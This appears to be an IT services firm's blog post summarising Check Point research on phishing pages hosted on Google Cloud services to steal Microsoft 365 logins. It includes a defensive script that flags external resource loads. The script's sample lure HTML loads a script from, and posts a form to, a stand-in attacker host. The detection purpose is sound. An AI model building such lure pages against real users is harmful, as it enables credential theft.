Software security company Check Point has published details of a phishing attack that abuses functions from Google’s cloud services. The phenomenon is not unique to Google: this attack is part of an ongoing trend among cybercriminals of using popular cloud-based services such as IBM Cloud, Microsoft Dynamics, and Microsoft Azure.
By using these services to host lure pages, attackers hide their real domain names from victims. An unfamiliar or altered domain name often raises a red flag about the legitimacy of a website, so this technique may convince more victims. It also presents new challenges for system administrators, because the same cloud services have legitimate uses and cannot simply be blocked. Check Point’s blog entry describes it as follows:
“Some of the warning signs that users generally look out for in a phishing attack include suspicious-looking domains, or websites without a HTTPS certificate. However, by using well-known public cloud services such as Google Cloud or Microsoft Azure to host their phishing pages, the attackers can overcome this obstacle and disguise their malicious intent, improving their chances of ensnaring even security-savvy victims.”
To highlight how attackers’ methods are evolving, the researchers give the example of an earlier campaign from January. Here, the victim is sent a link to a cloud-hosted PDF file, along with a supposed reason for opening it. On opening it, the displayed PDF page imitates a request to log in to Microsoft SharePoint, either with a Microsoft 365 account or an organisation ID. Clicking either link takes the victim to an imitation login page for Microsoft 365.
As both the PDF file and the login page are hosted on Google Drive, the victim only ever sees legitimate Google domains and so may see no reason to be suspicious. At the end of the process, the victim is delivered the PDF document that was promised in the original lure, perhaps leaving him or her unaware that credentials were harvested.
While an examination of the web page’s source reveals that it loads resources from a malicious website, later versions use Google Cloud Functions to hide even this, meaning that even normally cautious targets may fall for the lure.
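The check that exposed the earlier variant, listing resources a cloud-hosted page fetches from origins other than its own host, can be automated. The following Python is an added example, not code from Check Point or Pro-Networks; the page URL, hostnames and HTML are constructed, and `trusted_hosts` is an assumed allowlist for CDNs a legitimate page may use. The later Cloud Functions variant described above hides these loads, so this check would not expose it.

```python
# Added example: report resources that a page on a cloud-storage origin loads from other hosts.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tags/attributes that make the browser fetch from, or submit data to, another origin.
RESOURCE_ATTRS = {
    "script": ("src",), "img": ("src",), "iframe": ("src",),
    "link": ("href",), "form": ("action",),
}


class _ResourceCollector(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.urls = []

    def handle_starttag(self, tag, attrs):
        wanted = RESOURCE_ATTRS.get(tag)
        if not wanted:
            return
        for name, value in attrs:
            if name in wanted and value:
                # urljoin resolves relative paths and protocol-relative "//host/x.js" URLs,
                # a form attackers use so the scheme matches the hosting page.
                self.urls.append(urljoin(self.page_url, value.strip()))


def external_origins(page_url, html, trusted_hosts=()):
    """Return sorted (url, host) pairs for resources not served by the page's own host
    or by an explicitly trusted host (assumed allowlist, e.g. a known CDN)."""
    collector = _ResourceCollector(page_url)
    collector.feed(html)
    page_host = urlsplit(page_url).hostname
    found = set()
    for url in collector.urls:
        host = urlsplit(url).hostname
        if host and host != page_host and host not in trusted_hosts:
            found.add((url, host))
    return sorted(found)


# Constructed sample: a lure page on a cloud bucket pulling script and form target elsewhere.
SAMPLE_PAGE_URL = "https://storage.googleapis.com/example-bucket/login.html"
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="https://fonts.gstatic.example/font.css">
<script src="//attacker-controlled.example/collect.js"></script>
</head><body>
<img src="https://storage.googleapis.com/example-bucket/logo.png">
<form action="https://attacker-controlled.example/post.php" method="post"></form>
</body></html>"""

if __name__ == "__main__":
    for url, host in external_origins(SAMPLE_PAGE_URL, SAMPLE_HTML, ("fonts.gstatic.example",)):
        print(f"external load: {host:32} {url}")
```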
When investigating the domain used to load resources in the earlier attack, the researchers found that it resolved to an IP address in Ukraine. What’s more, this IP address, along with others on the same netblock, was the destination of many other suspicious domains. This allowed the researchers to trace how these attackers had developed their methods over the years, and how they varied their use of different cloud services in specific campaigns.
Cybercriminals are constantly adapting, but so are we at Pro-Networks. With our managed IT support services, we can help you achieve all-round protection. In this case, for example, we can mitigate the threat by ensuring that all Microsoft 365 accounts are secured with multifactor authentication, as well as by educating your employees about how to spot potential attacks.